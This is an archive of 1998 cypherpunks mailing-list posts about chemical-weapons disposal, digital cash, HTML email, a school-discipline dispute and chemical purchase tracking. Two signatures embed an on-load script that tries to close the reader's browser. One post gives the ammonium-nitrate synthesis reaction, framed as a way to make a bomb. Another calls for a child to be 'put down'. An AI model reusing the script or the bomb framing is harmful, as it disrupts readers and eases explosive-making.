Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id DAA19386
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 03:09:41 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id AAA26610; Sat, 21 Feb 1998 00:11:53 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id AAA26606 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 00:11:47 -0800 (PST)
Received: from infowest.com (infowest.com [204.17.177.10]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id AAA04260 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 00:06:29 -0800 (PST)
Received: from hun12.hun.org (attila.infowest.com [207.49.61.246])
	by infowest.com (8.8.8/8.8.5) with SMTP id BAA18367;
	Sat, 21 Feb 1998 01:10:44 -0700 (MST)
From: "Attila T. Hun" <attila@hun.org>
Reply-to: "Attila T. Hun" <attila@primenet.com>
Date: Sat, 21 Feb 98 07:57:36 +0000
To: Bill Stewart <bill.stewart@pobox.com>,
        cypherpunks <cypherpunks@cyberpass.net>
In-Reply-To: <3.0.5.32.19980220092346.008dd590@popd.ix.netcom.com>
Cc: listproc <attila@primenet.com>
Subject: destruction of chemical weapons
Owner: Attila T. Hun <attila@hun.org>
X-Comment: Cyberspace is Our Freedom!  Your CDA is Dead!
X-No-Archive: yes
Organization: old folks home for degenerate, unpenitent hackers; no crackers!
Message-ID: <19980221.075736.attila@hun.org>
Content-Disposition: inline
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.40 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=US-ASCII
Content-Length: 2098


-----BEGIN PGP SIGNED MESSAGE-----

on or about 980220:0923, in <3.0.5.32.19980220092346.008dd590@popd.ix.netcom.com>, 
    Bill Stewart <bill.stewart@pobox.com> was purported to have 
    expostulated to perpetuate an opinion:

    [snip]

>but the US refused for a long time to sign the CBW treaties, and I'm not
>sure they ever did follow through and destroy their supplies.
>				Thanks! 
>					Bill

    they built an enormous incinerator in Utah near the Nevada border
    in the area of Dugway, but not within that restricted zone. it went
    operation about 18-24 months ago, was closed last year for 
    verification of contamination (Utah and EPA obviously against it),
    and as far as I know, it's opeartional and doing its thing.

    the govt was also building a facility in the south pacific; maybe
    on what's left of Bimini or one nearby which are within the 
    protectorate --no idea what the status of that one is except 
    Greenpeace was doing their usual howling about transporting 
    the stuff both in the US and across the big pond --they were
    planning on exporting the stuff through the port at Oakland
    Navy Yard.

    one of the largest caches of obsolete stuff used to be in
    the old munitions bunkers just south of Long Beach between 
    the freeway and the ocean --if not seal beach, then huntington
    beach --the bunkers were for the Long Beach naval ship yard
    and the port of LA.  have no idea what the status is as that
    was years ago --you can see the bunkers from the freeway --they
    go on for a couple miles.

    we did not want the incinerator on Utah, and are not too
    enthused about the reactivation of Dugway as a "more secure"
    Area 51 --it is, and much harder to access with no visibility
    points that plagued area 51.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNO6L57R8UA6T6u61AQEbkQIAlj3rAwPjFadjaNFXk4lM0M5uePUnHXTz
wzgLPQZsLCPa3VmDcxDFIpQAl/K7fyNruJzLRAYJ6f2r096/DdKpyA==
=AW4q
-----END PGP SIGNATURE-----
    


From owner-cypherpunks@Algebra.COM Sun Feb 22 00:11 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19748 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 00:11:28 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23276
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:03:13 -0500 (EST)
Received: from galaxy.galstar.com (root@galaxy.galstar.com [204.251.80.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23256
	for <cypherpunks@ALGEBRA.COM>; Sat, 21 Feb 1998 11:03:07 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by galaxy.galstar.com (8.8.5/8.8.5) with ESMTP id IAA16608
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 08:17:07 -0600 (CST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id GAA09469; Sat, 21 Feb 1998 06:17:02 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id GAA09455 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 06:16:45 -0800 (PST)
Received: from grinch.whoville.leftbank.com (grinch.leftbank.com [139.167.128.2]) by rigel.cyberpass.net (8.8.8/8.7.3) with SMTP id GAA23292 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 06:11:25 -0800 (PST)
Received: from zax.whoville.leftbank.com by grinch.whoville.leftbank.com
          via smtpd (for rigel.infonex.com [209.75.197.3]) with SMTP; 21 Feb 1998 14:16:42 UT
Received: from max.whoville.leftbank.com (max.whoville.leftbank.com [139.167.32.1]) by zax.leftbank.com (8.8.5/8.7.3/LeftBank-1.1/http://www.leftbank.com/) with SMTP id JAA06335; Sat, 21 Feb 1998 09:16:34 -0500 (EST)
Received: from lbo.leftbank.com ([192.31.227.130]) by max.whoville.leftbank.com
          via smtpd (for zax.whoville.leftbank.com [139.167.32.33]) with SMTP; 21 Feb 1998 14:16:33 UT
Received: from [139.167.130.248] (ext-async-3.leftbank.com [139.167.130.248]) by lbo.leftbank.com (8.8.5/8.7.3/http://www.LeftBank.Com) with ESMTP id JAA04991; Sat, 21 Feb 1998 09:15:42 -0500 (EST)
X-Sender: rah@pop.sneaker.net (Unverified)
Message-Id: <v04003a34b11477d9c28b@[139.167.130.248]>
In-Reply-To: <3.0.5.32.19980220091102.008dd590@popd.ix.netcom.com>
References: <v04003a0cb1134f20d60d@[139.167.130.248]>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 08:33:36 -0500
To: Bill Stewart <bill.stewart@pobox.com>, cypherpunks@cyberpass.net
From: Robert Hettinga <rah@shipwright.com>
Subject: Re: A Geodesic Society?
Cc: e$@vmeng.com
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 5930


At 12:11 PM -0500 on 2/20/98, Bill Stewart wrote:


> Heh - West Coast Cypherpunks end up on Japanese TV :-)

So do Anguillan ones. And Boston ones, but they get edited out for talking
too much. And not having the requisite goatee ;-). Anyway, when they do pay
attention to these things moneypunks are more interested places in like
Financial Times, Institutional Investor, and of course Forbes. :-). Nikkei,
which is the Japanese equivalent of the Wall Street Journal, will do.  Of
course, J. Pierpont Morgan hired a PR man to keep J. P. Morgan & Co., Inc.,
*out* of the papers. I expect that'll happen soon enough... :-).

> Good article.

Thank you.

> If you're trying to emphasize the financial stuff,
> moving it up to the beginning would help, but I don't know the audience
> you wrote it for.

There were three lists, each with it's own group of paid ringers. One about
the net in general, with Rheingold on it, one on the net in Asia, with no
one I recognised, and one on net commerce, with me. :-). I was just warming
them all up for the next rant, which will be more on finance, with the
stuff at the end. That rant will only go to the commerce list.

> _Bell_ Labs,


Oops. Drag. Even a spelling checker would have caught that one...


> However, the Electro-Mechanical telephone switch was Not Invented Here -

I know the story about the mortician. The point I was trying to make was
that AT&T were "incentivized", by the cost of regulation, certainly, but
mostly by economics in general, to automate switching, not that they
invented the electromechanical switch in particular.

> The difficulty, of course, is that geodesic markets with bearer
> instruments make it easy to do business anonymously - so everyone
> may know that fraud was committed, but not know who committed it.

Actually, with anonymous bearer settlement, like with blind signatures, you
still need a perfect pseudonym to clear the trade, which, modulo a few
biometric peculiarities which I wrote a 40k rant about here in December
:-), is perfect anonymity. That pseudonym can have reputation, which is
(roughly) orthogonal to the biometric identity of the person owning that
pseudonym's private key.

Anyway, the whole point to bearer-settled transactions is that you're
trusting the issuer as far as the integrity of the certificates themselves
are concerned. First by the financial reputation of the issuer, and then by
the ability to inspect and validate the certificates when they're exchanged.

Since we haven't figured out a way to do a workable offline protocol,
modulo hints of one on the FC98 program :-), the problem of inspection is
handled by using an on-line protocol, which, in the case of Chaum,
essentially issues new, but blinded, certificates in the "name" of the
public key accepting them for payment or receipt. For larger value
transactions, anyway. The whole issue of doing a transaction offline with
current bearer settlement technology is obviously a question of financial
risk. I claim that the cost of bearer protocols, even when you reissue
blinded bearer certificates for every transaction, will still be cheaper
than book-entry settlement. It'll certainly be faster to clear and settle.

The exception to this, of course, is micropayments, where hash collision
tokens like MicroMint and hashcash, will probably be tested stocastically
for double spending, and expiration and other thing will probably handle
the rest. Since these will eventually be device-level payment systems, I
expect that fraudulent devices will have a harder time operating if their
reputation goes than people will, but maybe not.

The problem of the reputation of the issuer is simply a matter of
demonstrating nonperformance of the obligation represented by the bearer
certificate.

Which brings us to the parties using the certificates for exchange. I
expect the functional anonymity of blinded bearer protocols will be good
enough, but, like I said before, if someone wants to accept
second-generation offline blinded certificates in payment, their
willingness to do so is a function of financial risk. More to the point,
the reciever can test these certificates, and the person who offers them
for exchange is simply out their value if they turn out to be double spent,
so the risk is actually borne by the spender, same as it ever was.

Finally, there's the issue of fraud outside the integrity of bearer
certificates. Again, it's a function of financial risk. For low value
transactions, even the use of a perfect pseudonym is not necessary, and you
could use utterly anonymous transaction. However, I expect that persistant
perfect pseudonymity will be the rule, and that it will be functional
enough anonymity (modulo the biometric problems of transaction analysis I
talked about in December) for even the most decerning cypherpunk.


> The lack of need for accounts and reputation capital is part of what
> makes geodesic markets financially advantageous.  On the other hand,
> reconciling these differences is complex enough that cryptographers
> and financial folks can make big bucks getting it right :-)

Say 'amen', somebody. :-). If, as I claim, digital bearer settlement can
reduce the cost of transactions by three orders of magnitude over all forms
of book-entry settlement, then we'll have no choice to adopt them. As
people quite familiar with Moore's Law, we all know how much money can be
made when you reduce the cost of doing something so much. The rest, of
course, will be history. :-).

Cheers,



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>



From owner-cypherpunks@Algebra.COM Sun Feb 22 00:11 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19723 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 00:11:13 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23238
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:03:01 -0500 (EST)
Received: from galaxy.galstar.com (root@galaxy.galstar.com [204.251.80.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23217
	for <cypherpunks@ALGEBRA.COM>; Sat, 21 Feb 1998 11:02:55 -0500 (EST)
Received: from toad.com (toad.com [140.174.2.1])
	by galaxy.galstar.com (8.8.5/8.8.5) with ESMTP id JAA29259
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 09:17:53 -0600 (CST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id HAA08018 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 07:08:46 -0800 (PST)
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33]) by toad.com (8.7.5/8.7.3) with ESMTP id HAA08013 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 07:08:41 -0800 (PST)
Received: from whgiii (cppp25.dotstar.net [208.143.93.125])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id KAA14217;
	Sat, 21 Feb 1998 10:40:56 -0500
Message-Id: <199802211540.KAA14217@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 98 09:02:13 -0500
To: Bill Stewart <bill.stewart@pobox.com>
In-Reply-To: <3.0.5.32.19980220184839.008d4b50@popd.ix.netcom.com>
Cc: cypherpunks@toad.com
Subject: Re: I was auto-outed by an IMG tag in HTML spam
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 3441


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980220184839.008d4b50@popd.ix.netcom.com>, on 02/20/98 
   at 09:48 PM, Bill Stewart <bill.stewart@pobox.com> said:

>>   at 03:00 AM, Anonymous <anon@anon.efga.org> said:
>>>Use mail readers that don't automatically process HTML and
>>>connect to image servers, accept cookies, or run javascripts.  You are
>>>being watched by tricky defective, er, detective types. es.
>>
>>Several things here:
>>
>At 02:32 AM 2/18/98 -0500, William H. Geiger III wrote:
>>1. HTML in mail:
>>There is just no place for this crap in e-mail. If multipart/alternative
>>is used it is tolarable but pure text/html messages go into the bitbucket
>>with a autoreply explaining to the poster the error of their ways. :)

>HTML is a fine format for email.  It's ASCII readable, and supports
>content description tags that the user's mail reader can render as
>bold/italic/underline/header-levels//color/etc.  It's far superior to
>using bloated undocumented Microsoft Word attachments. 95% of the HTML
>email I get IS spam, but that's a separate problem :-) (After all,
>SPAMMERs like bright colored blinking attention-getting mail.)

Yes but who needs all this crap in e-mail?? E-Mail is a messaging protocol
not a protocol for large documents (HTML is not sutable for large
documents either but that is for another rant).

WARNING: This is the only time you will see me say somthing good about
MickySloth.

I must admit that atleast MS Outlook follows the RFC's and makes use of
multipart/alternative when sending out HTML formated messages so others
are not forced to use a webbrowser to read their mail (unlike Net$cape or
Eudora).

There is no place for HTML in e-mail plain and simple. I do not wan't to
have to load a huge bloated bugfilled webbrowser just to process my e-mail
messages.

>>My recomendations is to dump the Netscape garbage and get a real e-mail
>>client. Netsacpe has done a good job at screwing up the web we really
>>don't need the same favor from them with e-mail.

>Netscape mail is adequate for many people, just as Eudora is. Newer
>versions are pretty bloated, but including S/MIME mail encryption for
>everybody is a Good Thing.

Now this is really scary. You consider pushing weak 40bit S/MIME on the
internet users a GoodThing(TM)? I think you need to sit down and rethink
this one Bill.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>
 
Tag-O-Matic: Have you crashed your Windows today?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO7gPo9Co1n+aLhhAQEE4QQAkukbQzy1Dtw6g/vunMEBZ2o0tLs97lzw
oOAv01R/clFfPEOS64Zk+Yk+EZPg9vp++tLzgpijMOBEz0/pyEnSE3/9mCukhMm/
iQcaUy03eLm6wjK9hDOG04ktS69mVCgK49b9pmPDCdTXJz+MhNBgbenebNGa+97k
eVaA0mNCgcM=
=jjnj
-----END PGP SIGNATURE-----


From owner-cypherpunks@Algebra.COM Sun Feb 22 00:11 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19724 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 00:11:14 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23181
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:02:37 -0500 (EST)
Received: from galaxy.galstar.com (root@galaxy.galstar.com [204.251.80.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23162
	for <cypherpunks@ALGEBRA.COM>; Sat, 21 Feb 1998 11:02:28 -0500 (EST)
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33])
	by galaxy.galstar.com (8.8.5/8.8.5) with ESMTP id JAA29465
	for <cypherpunks@Algebra.COM>; Sat, 21 Feb 1998 09:20:31 -0600 (CST)
Received: from whgiii (cppp25.dotstar.net [208.143.93.125])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id KAA14306;
	Sat, 21 Feb 1998 10:52:22 -0500
Message-Id: <199802211552.KAA14306@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 98 09:13:43 -0500
To: Tim May <tcmay@got.net>
In-Reply-To: <v03102807b1140738ade7@[207.167.93.63]>
Cc: cypherpunks@Algebra.COM
Subject: Re: Some children are rabid and need to be put down
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 2872


-----BEGIN PGP SIGNED MESSAGE-----

In <v03102807b1140738ade7@[207.167.93.63]>, on 02/20/98 
   at 08:30 PM, Tim May <tcmay@got.net> said:


>At 6:29 PM -0800 2/20/98, William H. Geiger III wrote:

>>No not at all. We have some serious problems with the County Sherifs
>>Department down here.
>>

>I'm having a hard time understanding all this criticism of the actions.
>>From what I've read, the girl bit, scratched, threw chairs, etc.

>Many of us think 13- and 14-year-olds who commit murder should be
>executed (well, I do), so why should younger children be exempt from
>legal action?

Well I think that we have a large gap between a 5 year old little girl
having a temper tantrum and a teanager gangbanger going and shooting
people.

>I know that if a kid was throwing chairs at me I'd be tempted to throw a
>punch back...something that is strictly verboten. Lawsuits, criminal
>prosecution, never work in the school system again, that sort of
>verboten.

Well you have definatly jumped off the deep end on this one Tim. If we
were talking a teenager going out of control then I would agree with you.
A 5 year old though??

>If a teacher can't defend herself, legally and professionally, from
>children biting and throwing chairs, the cops have to be called.

If a teacher can not subdue and control a 5 year old little girl without
resorting to physical violence or calling in the storm troopers it's time
to look for another line of work.

>And from what I've heard about this little girl, it's beginning to sound
>like she ought to be put down like a dog that can't stop biting. Or at
>least kicked out of the school completely...perhaps a reform school will
>straighten her out.

When have you ever been so quick to blindly believe the spindoctoring of
the government Tim?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>
 
Tag-O-Matic: Have you crashed your Windows today?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO7i7I9Co1n+aLhhAQGCQgQAtKNhMFDKgk3Mxw7HbZv8aWAX0D50mola
dnJcEIqa/qtgoXhRt0jnGUZa8ilz6yHtZX78KlDv4KY4ps78bb/JKroLFG7Nfyg6
xVmzwGVLqRxRxC10LA7BIlive9ulaY6/diysNdRkFlgWYTuSzqUxt2dP+FCYH5p4
8mpGKRZ7mI0=
=YxPX
-----END PGP SIGNATURE-----


From owner-cypherpunks@Algebra.COM Sun Feb 22 09:32 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20676 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 09:32:44 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id UAA28742
	for cypherpunks-outgoing; Sat, 21 Feb 1998 20:23:01 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id UAA28730
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 20:22:54 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id RAA20279; Sat, 21 Feb 1998 17:25:10 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id RAA20269 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 17:25:03 -0800 (PST)
Received: from jehova.owl.de (jehova.owl.de [194.121.202.132]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id RAA28219 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 17:19:22 -0800 (PST)
Received: from fiction.pb.owl.de (root@fiction.pb.owl.de [193.174.12.5])
	by jehova.owl.de (8.8.8/8.8.8) with SMTP id CAA00655
	for <cypherpunks@cyberpass.net>; Sun, 22 Feb 1998 02:24:15 +0100 (MET)
Received: from squirrel.owl.de by fiction.pb.owl.de with bsmtp
	 id m0y6P8S-00001QC; Sun, 22 Feb 98 01:19 MET
Received: (qmail 29160 invoked by alias); 21 Feb 1998 10:13:02 -0000
Date: 21 Feb 1998 10:13:01 -0000
From: Secret Squirrel <anon@squirrel.owl.de>
Comments: Please report problems with this automated remailing service
	to <postmaster@squirrel.owl.de>. The message sender's identity
	is unknown, unlogged, and not replyable.
Subject: Vile Vial Files
To: cypherpunks@cyberpass.net
Message-ID: <12833561a6e4adb37573fcda57df3627@squirrel.owl.de>
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 3849


Timothy May wrote:

>(One can asssume that with more and more such things being added to the
>"watch lists" each year, that there will be less acceptance of cash, or
>anonymous digital cash, for such purchases.)

I tried to buy some chemicals down here with cash about six months ago. They
tried everything they could to get me to write a check and in the end I
stormed out of the building, leaving the merchandise on the counter. I
haven't been back yet, and there's probably a good chance that the security
camera footage was sent to the FBI. Come to think of it, that would explain
some rather wierd incidents I've observed since then.

People say that the only reason to pay in cash is if you have something to
hide. You're damned right. The last thing I want is a bunch of government 
shills keeping track of what I buy so that they can stage some raid because 
they have a record of me paying for a beaker "which could be used" to mix 
chemicals which "could be used" as explosives, or metal "which could be 
used" to make thermite which "could be used" for some nefarious purpose.

In America today if you have interests in biology, chemistry, or physics it
is considered grounds by both the government and the pathetic sheep to shoot
you. Pardon me if I'm a little bit paranoid these days. It used to be
intellectuals were just beat up and made fun of by the others in schools.
Now it's fashionable to throw them in jail or kill them. "Unauthorized 
and illegitimate research:" what a stupid concept.

The American people consider anybody who does things in secret to be
automatically guilty. Forget the principles that America was founded on! When 
the government sends the ninjas into your home because you were going 56 mph
when you passed a cop on the highway and looked over at him the wrong way
they sieze your computer. They find that you're running Linux. Oooh, you
must be evil because your computer is password protected but the Microshaft
apologist across the hall has his computer wide open. They find that you
have blocks of random data on your drive, and even if they don't get them
decrypted because they *ARE* blocks of completely random data they wave it
in front of a jury and get a guilty verdict.

It's a sad, sad state of affairs.

>ObMinorNote: I recently tried to buy a bag of ammonium nitrate for my
>yard...the local yard store says it hasn't been available to ordinary
>customers since OKC. I had to settle for ammonium sulfate instead.

It is when I read things like this that I realize how completely stupid the
entire government position is. Why do you need to buy ammonium nitrate to
make a bomb?

Assuming you just don't use something else which is more effective, why not
do this?

 NH OH + HNO --> NH NO  + H O
   3        3      3  3    2

So this naturally leads to the following question: Is having nitric acid and
ammonium hydroxide now a crime worthy of ninjas flying through your windows
with big guns in the middle of the night and shooting you because "you
looked like you were going for a weapon" when you flushed the toilet and
pulled your pants up?

Then if they don't have anything to charge you with they plant some drugs in
your toilet tank and claim that you were in "possession of drugs with
intention to distribute." Of course you were going to distribute them! You
had a truck and you frequently drove around! 

>We live in a dangerous world, full of potentially dangerous substances and
>things. Instead of dealing with the danger on a personal basis, we are
>using the government as our nanny, and also letting it record our
>purchases, open files on us for "unusual" purchases, and generally track
>our actions. Which actually won't have much effect on dedicated terrorists
>and criminals.

Exactly. Welcome to the shakedown extortion police state known as Amerika,
Land of the Freeh.


From owner-cypherpunks@Algebra.COM Sun Feb 22 02:25 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19975 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 02:25:16 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id NAA25100
	for cypherpunks-outgoing; Sat, 21 Feb 1998 13:17:35 -0500 (EST)
Received: from always.got.net (root@gotnet.znet.net [207.167.86.126])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id NAA25088
	for <cypherpunks@Algebra.COM>; Sat, 21 Feb 1998 13:17:31 -0500 (EST)
Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
	by always.got.net (8.8.8/8.8.7/Debian/GNU) with ESMTP id KAA25826
	for <cypherpunks@Algebra.COM>; Sat, 21 Feb 1998 10:19:46 -0800
X-Sender: tcmay@mail.got.net
Message-Id: <v03102808b114caa597c5@[207.167.93.63]>
In-Reply-To: <199802211552.KAA14306@users.invweb.net>
References: <v03102807b1140738ade7@[207.167.93.63]>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 10:22:42 -0800
To: cypherpunks@Algebra.COM
From: Tim May <tcmay@got.net>
Subject: Re: Some children are rabid and need to be put down
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 1776


At 6:13 AM -0800 2/21/98, William H. Geiger III wrote:

>Well you have definatly jumped off the deep end on this one Tim. If we
>were talking a teenager going out of control then I would agree with you.
>A 5 year old though??
>
>>If a teacher can't defend herself, legally and professionally, from
>>children biting and throwing chairs, the cops have to be called.
>
>If a teacher can not subdue and control a 5 year old little girl without
>resorting to physical violence or calling in the storm troopers it's time
>to look for another line of work.

My sister teaches Kindergarten/first grade in the LA County School
District, specifically, Inglewood (shudder). She is forbidden to:

- physically touch the children in any way

- discipline them in any meaningful way

- flunk them if they fail to behave or learn what is supposedly required

("Flunking Kindergarten" is tough, so where this rule really become
significant is in the higher grades, where all kids are promoted, even
those who can't read, can't add, etc.)

My sister says the teachers have zero power to do anything, and the kids
know it.

>When have you ever been so quick to blindly believe the spindoctoring of
>the government Tim?
>

Spare me the casual insults.

I call things as I see them. I've heard no spin-doctoring, just reports of
the child's behavior, admitted by her father.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.




From owner-cypherpunks@Algebra.COM Sun Feb 22 03:13 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20070 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 03:12:58 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id OAA25555
	for cypherpunks-outgoing; Sat, 21 Feb 1998 14:05:42 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id OAA25543
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 14:05:37 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id LAA21359; Sat, 21 Feb 1998 11:07:48 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id LAA21352 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 11:07:34 -0800 (PST)
Received: from toad.com (toad.com [140.174.2.1]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id LAA12043 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 11:02:15 -0800 (PST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id KAA09074 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 10:59:15 -0800 (PST)
